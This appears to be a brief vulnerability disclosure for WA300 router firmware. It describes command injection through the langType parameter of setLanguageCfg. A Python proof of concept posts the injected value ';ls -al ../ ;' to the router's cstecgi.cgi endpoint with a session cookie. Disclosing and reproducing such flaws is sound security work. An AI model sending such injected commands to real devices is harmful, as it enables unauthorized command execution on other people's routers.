Overview

Affected version

WA300 V5.2cu.7112_B20190227

Vulnerability details

In the WA300 V5.2cu.7112_B20190227 firmware has a command injection vulnerability in the setLanguageCfg function. The Var variable receives the langType parameter from a POST request. However, since the user can control the input of langType, the statement CsteSystem can cause a command injection vulnerability.

image-20260417234417440

POC

import requests
url = "<http://127.0.0.1/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {
"topicurl":"setLanguageCfg",
"langType":";ls -al ../ ;",
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

image-20240721213628055